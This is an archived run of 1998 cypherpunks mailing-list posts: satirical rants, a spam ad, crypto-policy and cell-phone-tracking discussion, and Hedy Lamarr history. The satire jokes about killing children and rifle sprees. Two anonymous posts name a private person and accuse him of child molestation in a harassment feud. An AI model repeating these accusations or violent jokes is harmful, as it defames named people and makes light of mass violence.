experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bienfait Nutly News <bnn@dev.null>
Date: Mon, 20 Apr 1998 10:42:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Epilogue 2/0 -- SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <353B8956.56B9@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


Epilogue 2/0 - SPACE ALIENS HIDE MY DRUGS!!!
_____________________________________________

		*** BIENFAIT NUTLY NEWS SPECIAL ***
	
		               **********************
		         *** KILL THE CHILDREN !!! ***
		               **********************

Introduction By:
A DANGEROUSLY CRAZED VIOLENT PSYCHO KILLER TO BE NAMED LATER

  It is with great fondness and trepidation that I recall the wonderful
summer days spent on the ball diamonds of Austin, Texas, in the late
1970's.
  Behind the dugout, under the stands, sharing a quick toke with other
members of Armadillo World HeadQuarters' jock-supporters--fans and
players of the legendary PSYCHO KILLERS, widely recognized as the most
dangerous-to-themselves opponents in the history of the Grand Game, no
matter where or how it was played.
  Slapping David Byrne upside his Talking Head for Bogarting the Belushi
and then realizing that his momentary lapse in proper drug-addict
ettiquette was a result of his attention being rivetted to some
terrifying incident of reality taking place out on the ball diamond.
  Seeing the outfielder nonchalantly digging his toe in the dirt at the
edge of the infield as a conference took place on the pitcher's mound
between the other members of the Austin Police Department ball team.
Watching in horror as the outline of a small finger could be seen poking
out from the dirt as the outfielder prodded his spiked toe in the dirt,
and then watching it being covered again, as he unconsciously tapped it
back down in the dirt.
  Knowing that you should have taken little Delbert's body to the river
and washed it down, with Tex Thomas & the Dangling Wranglers singing, "I
Am Washed In The Rum of the Lamb" softly in the background, according to
the instructions Rocky Erickson had received from Mars through the
fillings in his teeth after stepping out of the elevator on the 13th
floor, only to find himself in a vast wasteland of the mind where fear
and superstition coming from the Real (TM) floors of his brain structure
would sometimes cause him to doubt the voices.
  Hearing C.J. Parker, The County Mountie, drunkenly singing the ending
strains of the chorus of 'Armadillo (Are You Sure Jesus Done It This
Way?)': 
"And they catch those fly-balls on the head.
 And they never steal second, they steal first instead,
 Cause they learned all those moves that they make,
 From Panama Red."

  I don't wish to end up boring you with the youthful reminesces of a
doddering, senile old fart reliving the Glory Days in a time and place
where mental instability was honored and valued, whether it was C.J.
Parker singing about drug-induced mental instability of the Psycho
Killers, or Kinky Friedmann singing the praises of organic mental
disorder by hosting a Charles Whitman Memorial Reunion bash, with the
Texas Jewboys playing their harps in the background...
  Where was I...?

  Oh yes, I don't wish to end up boring you, but I'm a doddering, senile
old fart, so what the fuck can you expect, eh?

  The way this relates to CRYPTology is...

  At the end of MeatSpace lies...the Crypt!
  "Everybody want's to go to heaven, but nobody wants to die."
  "Nobody gets out of here alive."
  "I cooked Belushi's last spoon!"

  These are just a few of the song-titles which reflect the inherent
understanding of the muse that the rotting MeatSpace carcasses of the
CypherPunks will eventually turn to dust, but that the stench of their
vile, sick and twisted, 'shunned by every decent citizen' ideas and
philosophies will live on eternally in the biosemiotic evolution of
analogue life-forms crystallizing into the digital bits and bytes which
will exist forever in the CyberSpace home of virtual reality, the
Eternity Server.
  It was a lack of the esoteric understanding held by the Circle of
Eunuchs (AC/DC Rules!) Bienfait Nutly News reportwhores which led to DC
(Direct Current) journalists to proclaim the "Death of the CypherPunks,"
not understanding that the Toad was not dead, but had merely turned into
a Handsome Prince whose experiences in the bath houses of Sif Fiasco had
led him to realize that Human Gus-Peter should be shared with all who
wished to drink from the spigot of his knowledge, male *and* female,
regardless of whether or not they were wearing panties.

  Where was I...?
  Oh, yes...

  The sudden appearance of Bubba Rom Dos at the celebration for the
Pull-It,Sir Prize certain to be awarded for the, as yet, unwritten,
"KILL THE CHILDREN!!!" Bienfait Nutly News Special, reminded those
gathered of Bubba's infamous quote, "If murder is to have any meaning at
all, you must kill your friends."
  After singing a few verses of Bang! Crosby, Deathly Still & Gnashing
of Teeth's  hit song, "If you can't kill the one you love...kill the one
you're with." the reportwhores suddenly became stone-cold sober and,
realizing that the Canadian Author is Stone-Cold Crazy (TM), instantly
realized the true import of the Canadian AuthorTitty's efforts to drag
the InfoWar being waged in CyberSpace down into MeatSpace (where they
could kick the Author's sorry ass), by the confiscation of the physical
tools which he used to mirror analogue life onto the digital plane,
Electronically Forging ahead, past the historical boundaries of
MeatSpace Identity, into the Multi-User Persona Paridigm where
TruthMonger and [YourNameHere]@dev.null are free to live together in
peace and discord...

  Excuse me. I had to pause for a breath...

  Anyway, Armed Thugs With Massive MeatSpace Weaponry (TM) have a
deathly fear of being transmorgified into Mental Midgets by the
UnComprehensible InConceptual Distributed Digital Artistry (TM) taking
place in the parts of the brain used by the muse-- which go far beyond
the part of the brain where their own elevator stops, and they can go no
further, because taking the stairs isn't in their job description and
would probably get them in trouble with the union.
  Accordingly, they strike out like primitive savages at that which they
do not understand, using their heavy clubs to destroy the tools which
digital muses use to spam the MeatSpace Reality of the Decent Folk (TM)
with the '8 Words George Carlin Can't Say On The InterNet' :
1. Shit
2. Piss
3. Fuck
4. Cunt
5. Cocksucker
6. Motherfucker
7. Tits
8. Comstockery

~~~~
From: Wordsmith <wsmith@wordsmith.org>
To: linguaphile@wordsmith.org
Subject: A.Word.A.Day--comstockery

Comstockery (KOM-stok-uh-ree, KUM-) noun

   Censorship of literature and other forms of expression and
communication
   because of perceived immorality or obscenity.

[After Anthony COMSTOCK.]

WORD HISTORY: Bowdlerism, named after Dr. Thomas Bowdler (1754-1825),
has
been around longer than Comstockery, named for Anthony Comstock
(1844-1915).
All Bowdler did to enter the world of common nouns was to expurgate
Shakespeare, the Bible, and Gibbon's History of the Decline and Fall of
the
Roman Empire. On the other hand, Comstock, the organizer and secretary
of
the New York Society for the Suppression of Vice, helped destroy 160
tons
of literature and pictures that he deemed immoral. Comstockery, the word
honoring his achievements, is first recorded in 1905 in a letter by
George
Bernard Shaw to the New York Times: "Comstockery is the world's standing
Joke at the expense of the United States.... It confirms the deep-seated
conviction of the Old World that America is a provincial place, a second
rate country-town civilization after all.".
 
   "The best argument for upholding this electronic Comstockery can be
   summed up in a single world: zoning."
   Jeffrey Rosen, Can the government stop cyberporn?,
   The New Republic, 31 Mar 1997.
 
...........................................................................
Send your comments about words to anu@wordsmith.org.  To subscribe or
unsubscribe A.Word.A.Day, send a message to wsmith@wordsmith.org with
"Subject:" line as "subscribe <Your Name>" or "unsubscribe".  Archives,
FAQ, gift subscription form, and more at: http://www.wordsmith.org/awad/
~~~~

  Uuhhh...I remember where I 'was,' but I don't remember where I'm
'going'...

  Uuhhh....hhmm...........

[End of Epilogue 2/0, I guess]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Mon, 20 Apr 1998 19:51:48 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Epilogue 3/0 - SPACE ALIENS HIDE MY DRUGS!!! (Now containing special advertising inserts geared toward the reader's individual interests, based on your choice of password sfor your secret encryption keys.)
Message-ID: <353C0AA0.57AB@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Epilogue 3/0 - SPACE ALIENS HIDE MY DRUGS!!!
_____________________________________________

		*** BIENFAIT NUTLY NEWS SPECIAL ***
	
		               **********************
		         *** KILL THE CHILDREN !!! ***
		               **********************

  ...Oh, yeah...now I remember!

  TalkTV! 
  It's a bastard-child of two forms of media--radio and
television--whose parents could never truly enter into a real marriage
because of slight differences in their techno-ethnic backgrounds.
  Nonetheless,  CITV-Edmonton has a TalkTV program which is a televised
radio call-in talk show.apparently designed to circumvent the potential
danger of another 'War of the Worlds' fiasco resulting from the tendency
of gullible Sheeple to believe everything they hear, and thus ending
with them racing en-mass off the edge of a cliff because the current
demand for the teaching of  equality in the educational system does not
allow the students to be taught that there is a difference between sheep
and lemmings.

[The New World Mathematical Order Equality Equations:
  0 + 1 = 1 ; 1 + 2 = 1 ; 4 * 7 = 1 ; (38 -12) * (6 + 4) = 1
 "Why can't we just all get a one?" 
 ~ Rodney King, after being beaten by L.A. police for driving faster
than 1 mph]

  These facts alone have little or no bearing on the point I am about to
make, but, taken together with a giant leap of logic, they lead to the
unmistakable conclusion that I am receiving secret messages from the
Gods of Communication through TV, radio, email, InterNet browsers and
the things pinned to the bulletin board at the local laundromat.
  The messages say, "KILL...KILL...KILL...KILL..."

  This fact in itself is not particularly troubling, nor even
noteworthy, for that matter, since, as a TechnoInfoWarrior, I am free to
slip into the Righteous Armour of the TruthMonger Multi-User InterNet
Persona and use my massive hidden stocks of excess commas, overused
capital letters and misplaced quote marks to wreak havoc upon the
English language in a frenzy of random slaughter that will eventually
lead to a total draining of the life-blood of meaning coursing
throughout the veins of the ascii-output thrown upon the Screen of
Reality (TM) which is no longer Silver, but any color that the end-user
chooses it to be, with a click of a mouse-button.

{I am once again losing my train of thought, here, but please bear with
me, as I suspect that I will find it devilishly hiding on a side-track
of the next few paragraphs.}

  The Jesus Futures Market--run by TOTO Enterprises in Bienfait,
Saskatchewan, and backed by BlackTar Junk Bonds-- reflects the evolution
of religious-faith technology into the Digital Salvation Age where Jesus
becomes a true Multi-User Savior who can redeem the sins of anyone who
has a credit-card number that can be used to receive a valid password
from the SoulCheck Validation System that allows them access to a wide
variety of Redemption sites capable of meeting their individual needs
according to the nature of the Adult Sex sites they have been visiting
(although the.individual Redemption WebSites reserve the right to add
surcharges for the redemption of sins involving graphic reproductions of
sex acts with life-forms or inanimate objects which are not covered by
the Original Crucifixion).
  As well, the proliferation of WebSites reflecting the validity of a
wide range of religious beliefs (i.e. - GodHatesFags.com, 'God's
Canadian Biblical Hate Page', not to mention the ever popular
http://www.balaams-ass.com/journal/balaam.htm) has led end-users to the
realization that they are no longer limited to the 'official' bullshit
being fed to them by government, corporate, religilous and social
leaders, but can actually make their own bullshit official by slapping
it into HTML format, uploading it to the InterNet, and making it as
valid a part of Virtual Reality as the MSNBC news URLs singing the
praises of a kindlier, gentler IRS.
  In fact, if you can convince some other lunatics to 'Link' to your
WebSite, in return for providing 'links' to the bullshit and garbage
that they have made manifest from what started out as a bad case of gas
from eating too many refried beans, then you have a shot at the BigTime
(TM), perhaps becoming part of some Ring of Worms that will throw total
strangers randomly into your own professed belief system, even if you
just made it up when you were drunk and have no idea what it all means
when you, yourself,  read your own WebSite, yourself, even when you are
drunk again (like now).

  So, as you can plainly see, it is equally easy to get back on track to
what may have been the original point I was trying to make, by throwing
a crossing-switch in your mind which links the validity of all religious
beliefs, regardless of their truth, in Reality (TM) (as long as they are
an HTML formatted part of the New World DisOrder arising from an
unregulated InterNet), with the equal validity of believing each and
every wave, bit or byte of analogue or digital information capable of
knocking on the Doors of Perception, as a Message from
MadDogInPossessionOfTheLastFalseSmile exhorting The Perceiver to
"KILL...KILL...KILL!!!" everything that moves, and some that don't, on
the theory that, since THE LIE is the 'Mother of the 10,000 Lies',
whereas The Truth (TM) is  hard to come by, rabidly biting them all so
that they will die a slow and agonizing death (unless they get the whole
series of rabies shots in time) and letting Dog sort them out will be
mathematically verifiable as being in the overall best interests of
WeTheSheeple, in the long run, over the long haul, on average, for the
most part, despite the pathetic whining of individual survivors of The
RAGE (TM) (i.e. - Fred Goldman), who selfishly petition for individual
justice at the expense of  the current hit-and-miss justice system which
averages out (in the long run, over the long haul, for the most part)
instead of just moving to Russia, if they don't like it.
  In short, the entrance bar on the Turnstile of the Gate Heaven has
been lowered by WeTheNetizens, so that pretty much anyone can jump over
it if they are short on officially recognized righteousness tokens, as
long as their beliefs and actions have been validated by a single hit on
their "HOW MANY DEAD BODIES DOES IT TAKE TO SPELL, 'I *TOLD* YOU I WAS
CRAZY'" WebSite.

  Thus it follows, that MeatSpace Authorities who choose to engage
InfoWarriors in battle on the physical plane are ultimately responsible
for any mayhem and destruction that may result from the transmission of
Digital InformationWaves (which are fairly harmless in their natural
optic fiber cable environment), over the Analogue MeatSpace Medium of a
human brain which has a level of electric resistance that makes it a bad
conductor, leading to the buildup of the heat of inner rage that can
only be released by the gentle breeze provided by the heat-reduction
attachment on a rapid-fire assault rifle being fired in a suitable
environment, such as a Denny's Restaurant, a Post Office, or within 500'
of a school.
  
********
Text Only Commercial Break
[I regret that the added expense of bribing my oldest nephew to lend me
his laptop in order to route around the damage caused by Decent People
With Family Values (TM) has forced me to rent space in the 'SPACE ALIENS
HIDE MY DRUGS!!!' manuscripts to A-Word-A-Day, who have kindly provided
me with a steady supply of excess commas, overused capital letters and
misplaced quote marks gleaned from the rough drafts of their work by
consciencious editors who are hoping that the Author will 'choke' on
them.]
********

CAN'T POSSIBLY BE TRUE

* Robert Gettman Boone, 51, was arrested at his home in a
Baltimore, Md., suburb in January and charged as the man who had
been firing two-foot-long, homemade bombs from his front yard,
across a busy thoroughfare, to a lot behind a car wash.  According
to police, Boone told them, "There's nothing to get excited about,"
that he was "just doing some experiments with high explosives." 
(Later, it took authorities almost eight hours to remove all the
explosives that were in his home.) 

* In September, police at Los Angeles International Airport
stopped Mark L. Kulp, 34, at a metal detector before his flight
home to East Grand Forks, Minn.  In his carry-on bags, Kulp had
several guns, 100 rounds of ammunition, knives, handcuffs, a ski
mask, and a fake sheriff's badge.  The police confiscated the
equipment and detained Kulp, and even learned that he was wanted
on an arrest warrant in Minnesota for threatening a police officer. 
However, they decided they could not arrest him because the guns
were not loaded, and when Minnesota authorities declined to send
anyone to bring him back, Kulp was released. 

BOOKS BY CHUCK SHEPHERD:  The Concrete Enema and
Other News of the Weird Classics by Chuck Shepherd (Andrews
and McMeel, 1996, $6.95) is still available in some larger
bookstores.  Or you can order by mail from Atomic Books, 1018
N. Charles St., Baltimore MD 21201 (add $2 postage for the first
book, $3 for two to the same address, $4 for 3, and $5 for more
than 3) (credit card orders 1-800-778-6246,
http://www.atomicbooks.com).  Or by credit card  from
Andrews and McMeel, 1-800-642-6480 (they bill $2 postage per
book).  Also by Chuck Shepherd and available at some larger
bookstores (and at Atomic Books):  News of the Weird (Plume
Books, 1989, $9), More News of the Weird (Plume, 1990, $9),
Beyond News of the Weird (Plume, 1991, $9), and America's Least
Competent Criminals (HarperPerennial, 1993, $9).  (The 1989,
1990, and 1991 books were co-authored with John J. Kohut and
Roland Sweet.)  Chuck Shepherd does not sell books, himself.
********
We Now Return You To Our Regularly Scheduled Chaos
********

  Insertion of an advertisement for publications by Chuck Shepherd,
perpetrator of the News Of The Weird, in a space bought and paid for by
A-Word-A-Day's Anu(s), should be taken as proof of the veracity of my
long-standing claims to be a drunken, senile old fart whose inability to
control either his bladder, his mind or his mouth, makes him a
natural-born TruthMonger (A Subsiduary Of Bubba Rom Dos Enterprises).

  Speaking of which...
  I need to take a leak and grab another beer, so this seems as good a
place as any to end this portion of the Bienfait Nutly News "KILL THE
CHILDREN!!!" Special.
  So..."Smoke 'em if you got 'em.", grab yourself a Brewski, and write
you mom an email with no capital letters or punctuation marks (in order
to help save the linguistic environment from the ravaging effects of the
hole in the Bozo Layer of the Author's mind, leading to the creative
juices of the muse dripping down to form a bizarre mixture with his
procreative, gastric and intestinal juices, resulting in a conceptual
cocktail containing chaotic corruptions of linguistic manipulations
which have the capacity to suck the creative juices out of both the
minds and the cocks of those currently under Grand Jury investigation by
Special Persecutor, Dimitri Vulis KOTM, for CypherPunks Activities.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 57873.Tim
Date: Mon, 20 Apr 1998 21:34:37 -0700 (PDT)
To: 57873.Smart, Shopper
Subject: Nickel-A-Minute Long Distance Service Here NOW!
Message-ID: <199804210434.VAA22779@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


NICKEL- A- MINUTE Long Distance Service is Here NOW.

YES, IT IS REAL: 5 per minute Long Distance Service 7 days/week, 
24 hours/day! with an 18 second minimum, and 6 second 
billing increments. - and incredibly Low International Rates too.

But here's the best part: you can use this rate from any phone: your 
Cell Phone, Pay Phones, your neighbors phone, etc. 

For details simply mailto:tim@allways.net with "info" in the Subject Header

////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
You're online. and likely make long distance toll calls, so here's a chance to reduce long distance costs. 
Tthis is a benefit to you, however,  if you wish, simply put "remove" in the subject heading, and you will be 
placed on our Permanent Remove List and will never intentionally recive email from us again.
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 20 Apr 1998 16:01:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Gary Lee Burnore and His Anti-Privacy Zealots are on the Warpath!
In-Reply-To: <6gobin$ctl$1@camel20.mindspring.com>
Message-ID: <199804202301.BAA22881@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Belinda Bryan <eridani@databasix.com> wrote:

> The bottom line is that you'd better get down on your knees every night
> and pray to whatever you hold sacred that I don't find out who you are
> because if I do, I will make every minute of the rest of your miserable
> life an absolute hell.  And I won't break any laws to do it, nor will I
> hide behind a veil of anonymity.  This is no threat, it's a *promise*.

Why don't you just tell you child-molesting friend Gary Lee Burnore that if
he would keep his pants zipped up around the children, he wouldn't need to
hire you to fight his battles.  If he didn't molest a child in Santa Clara,
CA and then move to NC and register as a sex offender, the fact of his
conviction for that crime wouldn't have been published for all to see on
Nort Carolina's public registered sex offender's website, would it?  Just
because you don't like the message, don't shoot the messenger.  This was
the same loud-mouthed Burnore that previously said that republishing
publicly available data to Usenet was acceptable, and that he had nothing
to hide.  Now he's pissed that someone else is following his own example.

Anti-privacy kooks like you and DataBasix CEO Gary Lee Burnore are one of
the best arguments for the existence of anonymous remailers.  You and your
friends at DataBasix have a hard time bullying and harassing people into
silence that you can't identify, don't you?

Lest anyone forget, Gary launched his first tirade against anonymity when
someone tipped off his molestation victim's mother and school officials
anonymously.  Whistleblowing has always been one of the important functions
of anonymous remailers.  Of course, Gary denied the charges and accused the
victim's anonymous benefactor of "harassment" and "libel".  Now the public
record shows that Gary was guilty after all, by his own admission and
guilty plea.

Belinda, if you want to make Gary's "miserable life an absolute hell", why
don't you just marry him?

Now if I really wanted to start a vicious rumor, I'd wonder aloud whether
Raleigh, NC's two most famous resident kooks, Gary Burnore and the Rev.
Steve Winter are really one and the same person!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 20 Apr 1998 16:50:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Gary Lee Burnore, Convicted Child Molester in Raleigh, NC
In-Reply-To: <6go7ak$mmk$1@camel19.mindspring.com>
Message-ID: <199804202350.BAA29721@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Belinda Bryan <eridani@databasix.com> wrote:

> And let's not forget how he did exhaustive research of my posting
> history in Deja News and created a summary which included the location
> of my son's (former) preschool and submitted it for permanent archival
> on the Netscum page.

You need to be careful about posting information like that about your
children, especially since there is a registered sex offender, Gary Lee
Burnore <gburnore@databasix.com>, living in your neighborhood.

Why did you post information like that publicly in the first place if you
didn't want people to read it?

Also, it's amazing what people can dredge up on you.  One fellow was harassed
by having a 10 year old California tax lien posted worldwide to usenet in an
attempt to silence his dissenting opinions.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 21 Apr 1998 05:38:06 -0700 (PDT)
To: bill.stewart@pobox.com (Bill Stewart)
Subject: Re: "Lawful access" vs warrants:  I found the difference today!
In-Reply-To: <3.0.5.32.19980419144630.0084d100@popd.ix.netcom.com>
Message-ID: <199804211229.IAA18738@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart wrote:

| Even though there basically aren't any foreign Commies left any more,
| there's always The Pope, and Zionism, and Foreign Drug Cartels, and 
| foreign embassies*, and foreign-based MultiNational Corporations, 
| and people with accounts in Swiss banks or Anguillan computers.  
| Power isn't just for governments any more.

| ~~~
| * If they clue in to Elgoland and Vargaland, some of us could
| be in Big Trouble :-)
| ~~~

	If they had to be logically consistent, then recognizing
agents of Elgoland* as agents of a foreign power would require
recognizing Elgoland as a foriegn power.  That might be worth a few of
our spies.

* I have no idea where or who Elgoland is.

Umm, make that someone else's spies. :)

Adam


-- 
Just be thankful that Microsoft does not manufacture pharmaceuticals.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Tue, 21 Apr 1998 07:56:06 -0700 (PDT)
To: cypherpunks@cyberpass.net
Subject: OpenBSD possibly affected by Canadian Export Laws [Fwd]
Message-ID: <353CB023.3C86B75E@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



To: announce@openbsd.org
Subject: Urgent appeal: Gov't action on encryption: Please respond today!!
From: ian@darwinsys.com (Ian F. Darwin)
Date: Mon, 20 Apr 1998 09:47:11 -0400
Sender: announce-request@openbsd.org

OpenBSD is a secure operating system. To thrive, we need to be
able to continue making reliable and secure electronic communication
technology available. It is possible that the Canadian government
is about to take (well meaning but ill-informed?) policy decisions
that would result in the curtailment of our rights to export OpenBSD
as we know it.

Apologies for the short notice but it appears that the
Canadian government may be trying to put a fast one over
by having a sham "public comment" period before going
ahead with their own agenda. Possibly not. In any case,
the DEADLINE FOR COMMENTS IS APRIL 21, so please act on
this message today. [If you get this a day or two after
the deadline, please send a short note anyway; better late
than never!].

Thanks
Ian Darwin
ian@darwinsys.com
ian@openbsd.org

----- Begin Included Message -----
April 17, 1998
>From Mark D. Hughes
Institute for the Study of Privacy Issues (ISPI)
ISPI4Privacy@ama-gi.com


The following was posted in:
GLIC Alert (the Global Internet Liberty Campaign Newsletter)
Volume 2, Issue 5
April 13, 1998
http://www.gilc.org


[B4.4] Canada Sets the Stage for Encryption Action

On March 31, 1998, leaders of Canada's cryptography industry and
privacy advocates met in Ottawa to discuss and suggest an encryption
plan for Canada. Wired News reported that "the consensus among the
group was that Canada should continue its current stance of not
implementing any domestic crypto controls, and liberalize its existing
export policies."  The article quotes David Jones, president of
Electronic Frontier Canada (EFC is a GILC founding member): "We are
firmly opposed to any policy or legislation that would prohibit the
export of encryption of encryption products, either stored or
transmitted."

In February, the Canadian government invited public
comment when it issued "A Cryptography Policy Framework for Electronic
Commerce," where it depicts several different cryptography
possibilities.  According to Mark Hughes, executive director of the
Victoria-based Institute for the Study of Privacy Issues (ISPI): "its call for
public comment is, in my view, a cruel joke because the paper was only just
issued (February 21, 1998) and all public comment must be made by
April 21, 1998.  As few Canadians comprehend what encryption is and
how it affects them, two months is simply not enough time for
Canadians to sufficiently educate themselves in order to make informed
comments on the future of their electronic privacy."

Read Wired story: http://www.wired.com/news/news/politics/story/1

Canada's "Framework" proposal:
http://strategis.ic.gc.ca/SSG/cy00005e.html

Electronic Frontier Canada: http://insight.mcmaster.ca/org/efc

Institute for the Study of Privacy Issues (ISPI): ISPI4Privacy@ama-gi.com

********************************************************************************





----- End Included Message -----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 21 Apr 1998 10:28:42 -0700 (PDT)
To: kalliste@aci.net>
Subject: paid for making war on Iran & The Improbable Inventor of Frequency-Hopping Radio
Message-ID: <353CD5C5.71DB@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Tuesday 4/21/98 9:32 AM

J Orlin Grabbe
John Young
John Gilmore

ABQ J 4/21/98 A6

  U.S. Aided Communist Foe Pol Pot
  Richard Reeves

  LOS ANGELES - ...

  Even after he fell from national power, we helped supply and protect
  Pol Pot because the Khmer Rouge was tying down large number of
occupying
  North Vietnamese troops.
    These are some of the names of the evil who were or still are paid
friends:
  o  Saddam Hussein, paid for making war on Iran.
  o  Gulbuddin Hekmatry, who made his name throwing acid in the faces of
female
     students in Kabul who dared to wear western dress, paid for making
was against
     communists in Afghanistan.
  o  The Taliban, the religious warriors we helped train to fight
communists who are 
     beating or killing those same women right now in Afghanistan.
  o  Manuel Noriega, the soldier-thug we encouraged to overthrow
elections in Panama
     because we did not like the results.
  o  Mobuto Sese Seko, one Joseph Mobutu, our man in Zaire.
  o  Jonas Savimbi, in constant war in Angola
  The list goes on.  It has for a long time and will, even if communism
is dead as a
  national security threat of the United States.  In may of these cases
our interest 
  involved resources - oil, usually, ...

Details of exactly how the US helped Saddam are coming out. 
  
  http://jya.com/whpfiles.htm  
  http://www.aci.net/kalliste/

Let's change to a more positive topic.  Lively people.

  Scientific American, April 1998, 95,  Spread Spectrum Radio ...

  The Improbable Inventor of Frequency-Hopping Radio

  She was gorgeous, glamorous and talented.  And she had a mind for
technology.  In
  1941 actress Hedy Lamarr, along with the avant-garde composer and
musician George
  Anthiel filed for a patent to cover their "Secret Communication
System," a device designed
  to help the U.S. military jump from one frequency to another, thus
making enemy 
  interception and jamming difficult.
    Born Hedwig Maria Eva Kiesler in Vienna, Austria, Lamarr may have
gotten the idea of
  "frequency hopping" while she was married to Fritz Mandl, an armament
manufacturer
  who sold munitions of Adolph Hitler.  Through a marriage arranged by
her parents, Lamarr
  was Mandl's trophy wife, and she accompanied him to the many business
dinners and 
  meetings, where unbeknownst to the participants, she silently learned
about Axis war
  technology.  After four years with Mandl, Lamarr, a staunch anti-Nazi,
fled to London, 
  where MGM's Louis B. Mayer "discovered" her and convinced her to move
to the U.S.
    In Hollywood she me Antheil, who helped her figure out a way to
synchronize the 
  frequency hopping between the radio transmitter and receiver.  Their
invention, which
  they gave to the U.S. government for free, called for two paper rolls,
similar to those used in 
  player pianos, punched with an identical pattern of random holes.  One
of the rolls would
  control the transmitter on the submarine which the other would be
launched with the 
  receiver on the torpedo.  Though ingenious, the device was deemed too
cumbersome for use
  in World War II.  
    Still, the seminal idea of frequency hopping lingered.  By the late
1950s U.S. Navy contractors
  were able to take advantage of early computer processors for
controlling and synchronizing the
  hopping sequence.  Since then, the U.S. military has deployed more
sophisticated techniques with
  even faster processors in costly, classified devices, including
satellite communications systems.
  And today. And today the technology has become widespread in cell
phones and in personal
  communications (PCS), among other civilian applications. - D.R.H.

  HEDY LAMARR, the Hollywood actress, was the co-receipient of a patent
(inset)
  for basic  technology that is now widely used in cell phones and
personal 
  communications services(PCS).

US News & World Report, April 20, 1998 page 16

  PEOPLE IN THE NEWS	

  Saying she's been "humiliated and embarrassed ... has suffered mental
pain
  and anguish," the sultry 1940s screen star Hedy Lamarr, 84, has filed
a lawsuit
  seeking unspecified damages from the Corel Corp., a Canadian software
maker.
  The case, now in U.S. District Court, claims Corel used her image with
authorization.

My impression is that NSA attempted de-emphasize the most important
PRACTICAL 
technology for spread spectrum frequency-hopping an
ciphering/authentication:
shift register sequence [Galois fields, mod 2].  

But this is not working largely because of Internet

  http://www.semionoff.com/cellular/hacking/phreaking/

NSA, a user of Forth, also tried to do hide threaded code technology.
This isn't working for NSA either.

Let's hope for settlement so that we can get on to more, if I can even 
imagine such, projects.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Tue, 21 Apr 1998 15:08:52 -0700 (PDT)
To: die@die.com
Subject: Re: Position escrow
In-Reply-To: <19980417175445.54922@die.com>
Message-ID: <199804212208.PAA22084@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


This is a really difficult issue. Even the most diehard cypherpunk
cannot doubt the usefulness of a cellular position reporting
capability in an emergency situation, when the user *wants* the cops
or whoever to know where he is.  The big problem is how to keep it
from being used (or abused) for "law enforcement" purposes without the
consent of the user.

The main reason GPS receivers are not being used is simple economics:
as small and cheap as they're getting, they're still too big and
expensive for a cell phone. It's not just the electronics, but the
antenna too. And they don't work too well indoors.  So the
manufacturers are developing ways to locate the phone using complexity
in the base station, where it can be shared. Various time-of-arrival
schemes are being proposed. CDMA has an inherent capability because
it (like GPS) uses spread spectrum, although there are near-far
problems to be solved.

I expect the main countermeasure to cellular position tracking will be
the use of one-way pagers. Keep your cell phone turned off, and if you
get a page when you're someplace you don't want them to know, wait
until you leave before you return the page.

Perhaps if the "just turn it off" approach is widely promoted, the
carriers and vendors will see the threat to their business and press
for some safeguards. Otherwise they just won't give a damn.

Phil






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 21 Apr 1998 16:43:53 -0700 (PDT)
To: Phil Karn <karn@qualcomm.com>
Subject: Re: Position escrow
In-Reply-To: <199804212208.PAA22084@servo.qualcomm.com>
Message-ID: <Pine.SUN.3.91.980421153643.2922A-100000@netcom5>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 Apr 1998, Phil Karn wrote:

> This is a really difficult issue. Even the most diehard cypherpunk
> cannot doubt the usefulness of a cellular position reporting
> capability in an emergency situation, when the user *wants* the cops
> or whoever to know where he is.  The big problem is how to keep it
> from being used (or abused) for "law enforcement" purposes without the
> consent of the user.

Usfull != good idea. If the information is available for some purposes, 
it is, or soon will, become available for other purposes. The only way to 
prevent this is to not make the information available for *any* purpose.

I gladly take the cellphone without 911 locator over the cellphone with 
24/7 postion escrow. Furthermore, I content that there is no middle 
ground between the two. Assuming of course the phone doesn't have an 
active locator device that can be enabled using a special 911 button.

YMMV.

-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kathleen Ellis <ellis@epic.org>
Date: Tue, 21 Apr 1998 13:52:07 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Fwd: 1998 EPIC Cryptography Conference - June 8 - Washington, DC
Message-ID: <v04003a02b162b6faa913@[204.91.138.223]>
MIME-Version: 1.0
Content-Type: text/plain



>
>
>   Top Government Officials, Industry Leaders, Cryptography Experts
